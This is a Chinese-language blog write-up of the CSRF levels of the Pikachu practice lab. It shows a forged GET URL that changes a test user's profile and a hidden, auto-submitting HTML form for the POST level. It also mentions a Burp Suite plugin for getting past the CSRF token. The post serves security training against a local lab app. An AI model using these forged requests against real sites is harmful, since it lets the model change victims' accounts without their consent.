当前位置: 首页 > news >正文

pikachu靶场-CSRF

CSRF:

介绍:

Cross-site request forgery简称为"CSRF”。

在CSF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接)

然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击也就完成了(本题是修改个人信息)。

所以CSRF攻击也被称为为"one click'"攻击。

1.CSRF(get):

我们先登录lucy的账号,点击修改信息,顺便用bp抓个包。

成功抓到数据包,看到get请求:


GET /vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=12345678922&add=beijing&email=lucy%40pikachu.com&submit=submit
http://127.0.0.1/pikachu//vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=12345678922&add=beijing&email=lucy%40pikachu.com&submit=submit
我们把性别改成男:
http://127.0.0.1/pikachu//vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=12345678922&add=beijing&email=lucy%40pikachu.com&submit=submit

若lucy此时登录了该网站,点击了我们构造的 url 就会修改个人信息。

这里也可以使用一些短链接的方式。lucy访问该网站即可修改信息。

2.CSRF(post):

这里依旧拿lucy的个人信息实验,我们点击随便修改一下个人信息,顺便bp抓包。

此时 lucy 信息:

post传参的话,需要我们自己创一个表单,进行提交。

sex=boy&phonenum=111111&add=beijing&email=lucy%40pikachu.com&submit=submit
--------------------
我们自己创一个html的文件,放到服务器上,
<html><script>                                                                                                       <!-- 这个script是用来自动提交表单的 -->window.onload = function() {document.getElementById("submit").click();}</script>              <body><form action="http://127.0.0.1/pikachu/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">    <input type="hidden" name="sex" value="boy" /><input type="hidden" name="phonenum" value="111222" /><input type="hidden" name="add" value="beijing" /><input type="hidden" name="email" value="lucy@pikachu.com" /><input type="hidden" name="submit" value="submit" /><input id="submit" type="submit" value="Submit request" style="display:none"/>                    <!-- style设置为display:none起到隐藏submit按钮的作用 --></form></body>
</html> 

利用phpstudy将文件路径放到pikachu目录下,访问后修过成功。

http://127.0.0.1/pikachu/srf_post.php

3.CSRF Token:

这个时候,我们可以利用 burp suite 的插件 CSRF Token Tracker 来绕过

此时lucy个人信息如下,和抓包信息。

插件信息:

修改数据包,刷新lucy的个人信息即可发现数据被更改。

http://www.lryc.cn/news/304278.html

相关文章:

  • 【结合OpenAI官方文档】解决Chatgpt的API接口请求速率限制
  • C语言实现基础数据结构——栈
  • 船舶制造5G智能工厂数字孪生可视化平台,推进船舶行业数字化转型
  • 【网络编程】okhttp深入理解
  • 大功率厚膜电阻器制造 – 优化性能?
  • ElasticStack安装(windows)
  • gitlab的使用
  • 基于springboot+vue的植物健康系统(前后端分离)
  • Python爬虫实战入门:爬取360模拟翻译(仅实验)
  • 微服务-微服务API网关Spring-clould-gateway实战
  • ECMAScript modules规范示例详解
  • 【OpenFeign常用配置】
  • 第2.1章 StarRocks表设计——概述
  • WooCommerce商品采集与发布插件
  • select滑动分页请求数据
  • 【Go channel如何控制goroutine并发执行顺序?】
  • 逆向分析Cobalt Strike安装后门
  • 【嵌入式学习】QT-Day3-Qt基础
  • 【杭州游戏业:创业热土,政策先行】
  • Python-pdfplumber读取PDF内容
  • js设计模式汇总
  • 【Java面试】MongoDB
  • 在苹果电脑MAC上安装Windows10(双系统安装的详细图文步骤教程)
  • 18V/5A桥式驱动芯片-SS6285L兼容替代RZ7889
  • C++ Primer 笔记(总结,摘要,概括)——第3章 字符串、向量和数组
  • Sora:OpenAI引领AI视频新时代
  • [FPGA开发工具使用总结]VIVADO在线调试(1)-信号抓取工具的使用
  • Linux ip route命令
  • WordPress有没有必要选择付费主题
  • 软考-中级-系统集成2023年综合知识(一)